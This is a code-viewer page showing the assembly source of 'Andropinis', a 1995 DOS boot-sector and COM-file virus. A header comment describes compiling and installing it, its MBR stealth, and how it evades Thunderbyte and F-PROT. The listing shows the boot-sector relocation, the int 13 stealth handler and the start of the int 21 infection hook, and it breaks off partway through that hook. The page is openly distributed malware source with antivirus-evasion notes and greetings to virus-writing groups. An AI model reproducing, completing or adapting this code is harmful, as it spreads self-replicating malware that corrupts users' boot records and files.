📄 andropin.asm
字号:
;******************************************************************************
;
; Virus name : Andropinis
; Author : Rajaat
; Origin : United Kingdom, March 1995
; Compiling : Using TASM | Using A86
; |
; TASM /M2 ANDROPIN.ASM | A86 ANDROPIN.ASM
; TLINK ANDROPIN |
; EXE2BIN ANDROPIN |
; Installing : Place the produced BIN file at cylinder 0, head 0, sector 2
; Modify the partition record to point to this code
; (a debug script is provided at the end of this source)
; Targets : Master Boot Record & COM files
; Size : 512 bytes
; Polymorphic : No
; Encrypted : No
; Stealth : Full Stealth on Master Boot Record
; Tunneling : No - is not needed if started from Master boot record
; Retrovirus : No
; Antiheuristics: Yes - for TBAV
; Peculiarities : Infects MBR by modifying 2 bytes
; Uses SFT's to infect COM files
; Avoids Thunderbyte Antivirus using a 2 byte signature!
; Behaviour : When an infected COM file is run, the virus will not become
; resident, but will first infect the master boot record. It
; does its work in a very peculiar way. It modifies the
; 1st partition record with the result that it points to
; cylinder 0, head 0, sector 2. The viral bootsector will be
; stored there. The next time when a system is booted,
; Andropinis will become resident in high memory, but below
; the top of memory. Programs like CHKDSK.EXE will show a
; decrease in system memory of 1024 bytes. The virus will hook
; interrupt 13 at this time and wait till interrupt 21 is
; captured 3 times. Andropinis will then take interrupt 21
; itself. The virus is now stealth on the master boot record,
; only modifying the pointer to the bootsector in memory when
; the master boot record is read. The virus will infect COM
; files when copied, therefore not needing a critical interrupt
; handler. Andropinis will only infect COM files when they are
; between 4095 and 61441 bytes. Infected files will begin with
; a PUSH AX, DEC BX, NOP and a near jump to the virus code.
; The first 2 instructions will cause the Thunderbyte scanner
; to avoid the file. It thinks it's processed with PkLite! f
; Even the "ex"tract option doesn't work and gives back a "N/A"
; for every infected file. F-PROT detects nothing, except when
; the /ANALYSE option is used. AVP gives a virus "Type Boot"
; suspicion. How true that is. The weak point of the virus is
; its lack of protection in infected COM files, so it relies on
; the fact that the Master Boot Record infection isn't visible.
; Tai-Pan spread also far, and was even more simplistic than
; Andropinis, with the exception that is infected the more
; common filetype, the EXE file. The virus doesn't do any
; intended harm, as Patty would say :
; "It's unknown what this virus does besides replicate."
; Yoho's : VLAD, Immortal Riot, Phalcon/Skism, [NuKE],
; and all other virus writers that exist.
;
;******************************************************************************
.model tiny ; this must become a BIN file
.code ; let's start with the code, ok
.radix 16 ; safe hex
org 0 ; throw it in the bin
;******************************************************************************
; Viral boot sector
;******************************************************************************
virus: xor bx,bx ; initialise stack and data
cli ; segment
mov ss,bx ;
mov ds,bx ;
mov sp,7c00 ;
push sp ;
sti ;
mov si,413 ; steal some memory from the
dec word ptr [si] ; top
lodsw ;
mov cl,6 ; calculate free segment for
shl ax,cl ; virus
mov es,ax ;
pop si
mov di,bx ; push data for a far jump to
push di ; the virus code in high memory
push es ;
lea ax,init_resident ;
push ax ;
mov cx,100 ; move the code to high memory
move_boot: movsw ; this doesn't trigger tbav
loop move_boot ;
retf ; return to the address pushed
;******************************************************************************
; the following piece of code is executed in high memory
;******************************************************************************
init_resident: mov byte ptr cs:hook_21_flag,0 ; reset int 21 hook flag
lea di,old_13 ; store old int 13 vector and
mov si,4*13 ; replace it with our new
lea ax,new_13 ; handler
xchg ax,[si] ;
stosw ;
mov ax,cs ;
xchg ax,[si+2] ;
stosw ;
mov si,4*21 ; store new address to int 21
lea ax,new_21 ; vector
xchg ax,[si] ;
mov ax,cs ;
xchg ax,[si+2] ;
pop es ; read the original bootsector
push es ; and execute it
mov ax,0201 ;
mov dx,180 ;
mov cx,1 ;
mov bx,7c00 ;
push bx ;
int 13h ;
retf ;
;******************************************************************************
; new int 13 handler
;******************************************************************************
new_13: cmp ax,5001 ; installation check
jne no_inst_check ;
xchg ah,al ;
iret
no_inst_check: cmp ah,2 ; check if partition sector
jne no_stealth ; is read. if not, there's
cmp dx,80 ; no need to use stealth
jne no_stealth ;
cmp cx,1 ;
jne no_stealth ;
pushf ; perform read action, and
call dword ptr cs:[old_13] ; go to stealth_mbr if no error
jnc stealth_mbr ; occured
retf 2 ;
stealth_mbr: cmp word ptr es:1bf[bx],200 ; is the virus active?
jne not_infected ; no, goto not_infected
mov word ptr es:1bf[bx],0101 ; stealth virus
not_infected: iret ;
no_stealth: cmp byte ptr cs:[hook_21_flag],3; if this is try 3 to get int
je eoi_13 ; 21, get lost to eoi_13
push ax ; preserve these
push ds ;
xor ax,ax ; is int 21 changed?
mov ds,ax ;
mov ax,cs ;
cmp ax,word ptr ds:[4*21+2] ;
je int_21_ok ; no, int 21 is ok
inc byte ptr cs:[hook_21_flag] ; increase the hook int 21 flag
lea ax,new_21 ; capture int 21 and store
xchg ax,ds:[4*21] ; the old vector
mov word ptr cs:old_21,ax ;
mov ax,cs ;
xchg ax,ds:[4*21+2] ;
mov word ptr cs:old_21[2],ax ;
int_21_ok: pop ds ; get these back
pop ax ;
eoi_13: jmp dword ptr cs:[old_13] ; chain to old int 13
;******************************************************************************
; new int 21 handler
;******************************************************************************
new_21: cmp ah,40 ; is a write command performed?
je write_to_file ; yeah, write_to_file
eoi_21: jmp dword ptr cs:[old_21] ; chain to old int 21
write_to_file: push ax ; preserve some registers
push bx ;
push dx ;
push di ;
push es ;
mov ax,4400 ; check if the write belongs
int 21 ; to a device
test dl,80 ;
jnz not_suitable ;
mov ax,1220 ; find file handle table that
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -